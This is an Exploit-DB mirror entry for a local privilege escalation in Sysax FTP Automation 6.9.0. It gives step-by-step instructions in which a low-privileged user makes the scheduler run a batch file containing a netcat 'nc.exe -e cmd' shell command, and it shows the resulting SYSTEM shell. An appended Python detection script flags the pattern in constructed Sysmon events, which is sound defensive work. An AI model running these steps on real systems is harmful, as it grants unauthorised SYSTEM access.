exploit-db-mirror/exploits/windows/local/50834.txt
Offensive Security e55394b7d4 DB: 2022-03-23
6 changes to exploits/shellcodes

Sysax FTP Automation 6.9.0 - Privilege Escalation
iRZ Mobile Router - CSRF to RCE
Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure

ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
2022-03-23 05:01:38 +00:00


# Exploit Author: bzyo (@bzyo_)
# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation
# Date: 03-20-2022
# Vulnerable Software: Sysax FTP Automation 6.9.0
# Vendor Homepage: https://www.sysax.com/
# Version: 6.9.0
# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi
# Tested on: Windows 10 x64
# Details:
The Sysax Scheduler Service runs as Local System. By default, the application allows low-privilege users to create and run backup jobs as a user other than themselves. If the option to run as the current user or another user is removed, the task runs as System. A low-privilege user could abuse this to escalate their privileges to Local System.
# Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low-privileged user account.
# Exploit:
Logged in as a low-privileged account:
1. Create folder c:\temp
2. Download netcat (nc.exe) to c:\temp
3. Create file 'pwn.bat' in c:\temp with contents
   c:\temp\nc.exe localhost 1337 -e cmd
4. Open a command prompt and start a netcat listener
   nc -nlvvp 1337
5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation
6. Select Setup Scheduled/Triggered Tasks
- Add task (Triggered)
- Update folder to monitor to be c:\temp
- Check 'Run task if a file is added to the monitor folder or subfolder(s)'
- Choose 'Run any other Program' and choose c:\temp\pwn.bat
- Uncheck 'Login as the following user to run task'
- Finish and Save
7. Create new text file in c:\temp
8. Check netcat listener
   C:\WINDOWS\system32>whoami
   whoami
   nt authority\system
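
# Detection (added example):
Detection logic for the behaviour described above, added here as an example and not part of the original advisory: it flags process-creation events in which a process from the Sysax install directory starts, as SYSTEM, a program or script located outside administrator-only directories. The events are constructed, the field names follow Sysmon Event ID 1, `svc_placeholder.exe` is a placeholder because the advisory does not name the service binary, and it is an assumption that the service is the direct parent of the task process.

```python
import re
from pathlib import PureWindowsPath

# Install directory from the write-up. The service binary name is not given
# there, so the parent is matched on its directory only.
SYSAX_DIR = PureWindowsPath(r"C:\Program Files (x86)\SysaxAutomation")
# Assumption: these roots are writable by administrators only.
PROTECTED = [PureWindowsPath(p) for p in
             (r"C:\Windows", r"C:\Program Files", r"C:\Program Files (x86)")]
# Quoted or unquoted drive-letter paths; unquoted paths containing spaces are
# cut at the first space and may therefore be over-reported.
PATH_RE = re.compile(r'"([A-Za-z]:\\[^"]+)"|([A-Za-z]:\\\S+)')

def under(path, root):
    """Case-insensitive 'path is root or below it' (PureWindowsPath semantics)."""
    return path == root or root in path.parents

def referenced_paths(event):
    """The process image plus every path named on its command line."""
    cmd = [q or u for q, u in PATH_RE.findall(event.get("CommandLine", ""))]
    return [PureWindowsPath(p) for p in [event.get("Image", ""), *cmd] if p]

def user_writable_targets(event):
    """Paths outside PROTECTED run as SYSTEM by a process in SYSAX_DIR."""
    if event.get("User", "").upper() != r"NT AUTHORITY\SYSTEM":
        return []
    if not under(PureWindowsPath(event.get("ParentImage", "")), SYSAX_DIR):
        return []
    return sorted({str(p).lower() for p in referenced_paths(event)
                   if not any(under(p, r) for r in PROTECTED)})

# Constructed process-creation events (Sysmon Event ID 1 field names).
# "svc_placeholder.exe" stands in for the unnamed service binary.
SVC = r"C:\Program Files (x86)\SysaxAutomation\svc_placeholder.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"User": r"NT AUTHORITY\SYSTEM", "ParentImage": SVC, "Image": CMD,
     "CommandLine": CMD + r" /c c:\temp\pwn.bat"},
    {"User": r"NT AUTHORITY\SYSTEM", "ParentImage": SVC, "Image": CMD,
     "CommandLine": CMD + r' /c "C:\Program Files\Constructed\sync.cmd"'},
    {"User": r"HOST\lowpriv", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": CMD, "CommandLine": CMD + r" /c c:\temp\pwn.bat"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        hits = user_writable_targets(ev)
        if hits:
            print("ALERT SYSTEM child of Sysax runs:", hits)
```

Only the first constructed event is flagged: the second runs a script from an administrator-only directory, and the third is neither SYSTEM nor a child of the Sysax directory.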